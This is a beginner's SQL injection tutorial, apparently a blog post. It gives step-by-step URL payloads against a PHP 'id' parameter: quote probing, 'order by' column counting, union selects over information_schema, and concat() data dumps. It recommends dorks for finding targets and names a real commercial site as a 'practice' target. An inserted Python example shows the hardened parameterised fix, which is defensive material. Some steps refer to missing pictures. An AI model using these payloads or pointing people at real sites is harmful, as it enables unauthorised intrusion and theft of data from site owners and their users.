Hi friends, today I will show you a step-by-step SQL injection (SQLi) tutorial for beginners.
For this you need a vulnerable site. For your practice I am giving you a vulnerable site link, but in my tutorial I am using an example.
Let us take an example: http://www.site.com/index.php?id=1
There are many dorks available to find SQLi-vulnerable sites; it is better to make your own dork.
Now we have to check whether this site is vulnerable to SQLi. To do that, simply add a single quote (') at the end of the link.
Example: http://www.site.com/index.php?id=1'
If you get the error below, then this site is vulnerable to SQLi:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
Now the real thing starts.
Now we have to find the number of columns. Follow the steps below:
http://www.site.com/index.php?id=1 order by 1 --+ (no error)
http://www.site.com/index.php?id=1 order by 2 --+ (no error)
http://www.site.com/index.php?id=1 order by 3 --+ (no error)
http://www.site.com/index.php?id=1 order by 4 --+ (no error)
http://www.site.com/index.php?id=1 order by 5 --+ (error, i.e. Unknown column '5' in 'order clause')
That means there are 4 columns.
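Why the quote and `order by` probes above surface database errors, and what removes them, as an added example that is not part of the original tutorial. It uses Python's sqlite3 with a constructed four-column table, so the error text differs from MySQL's; the names `products`, `lookup_vulnerable` and `lookup_hardened` are assumptions.

```python
import sqlite3

# Constructed sample data: a 4-column table standing in for the tutorial's example page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, descr TEXT, price REAL)")
    db.execute("INSERT INTO products VALUES (1, 'widget', 'sample row', 9.5)")
    return db

def lookup_vulnerable(db, raw_id):
    """The 'before': the id parameter is pasted straight into the SQL text."""
    sql = "SELECT id, name, descr, price FROM products WHERE id = " + raw_id + " LIMIT 0,1"
    try:
        return ("ok", db.execute(sql).fetchone())
    except sqlite3.Error as exc:
        # Returning the database error to the client is what makes the probes readable.
        return ("db-error", str(exc))

def lookup_hardened(db, raw_id):
    """The 'after': validate the type, then bind the value as a parameter."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return ("rejected", None)  # generic response, no SQL error text
    row = db.execute(
        "SELECT id, name, descr, price FROM products WHERE id = ? LIMIT 0,1",
        (int(raw_id),),
    ).fetchone()
    return ("ok", row)

# Probes quoted from the tutorial, URL-decoded ("--+" reaches the server as "-- ").
PROBES = ["1", "1'", "1 order by 4 -- ", "1 order by 5 -- "]

def compare(db):
    """Map each probe to (vulnerable outcome, hardened outcome)."""
    return {p: (lookup_vulnerable(db, p)[0], lookup_hardened(db, p)[0]) for p in PROBES}

if __name__ == "__main__":
    for probe, (before, after) in compare(make_db()).items():
        print(f"{probe!r:22} vulnerable={before:9} hardened={after}")
```

In the hardened version the input never becomes SQL syntax, so the error-versus-no-error difference that the column-count step relies on disappears.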
Now we have to find the vulnerable column, that is, the column where we have to inject.
Follow the procedure
Now check whether one of the numbers 1, 2, 3 or 4 is displayed on the webpage, like the below picture
Obtaining database version: it is very easy on a simple SQLi site, just replace the vulnerable columns.
Here 2 and 3 are vulnerable and you can choose any one column to inject.
Here I am selecting 3 and
Check the example how you can obtain the database version
Here you can also use “@@version” in place of “version()”.
Obtaining the database name and user works the same as for the version: just replace version() with database() for the database name, and replace version() with user() for the database user.
Now we have to retrieve the database.
We have to find the table names from the database. For table names we have to write the query like the example below:
Example: http://www.site.com/index.php?id=-1 union all select 1,2,table_name,4 from information_schema.tables where table_schema=database() --+
Or you can replace database() with the database name in single quotes, e.g. 'mydatabase'.
Now we have to find the column names of the tables available in the database:
Example: http://www.site.com/index.php?id=-1 union all select 1,2,column_name,4 from information_schema.columns where table_name='xyz' --+
You have to replace xyz with the name of the table whose column names you want to retrieve.
Now the last step: if you want to retrieve data from a table, write the query like this:
1,2,concat(0x3a,columnname,0x3a,columnname),4 from tablename --+
Here replace the column name and table name according to your database.
Here is a vulnerable site link for practice; don’t misuse it.
Vulnerable link: http://www.naturesplus.com/sourceoflife/products/productDetail.php?id=30595
Hope you like the post. Give your valuable comments.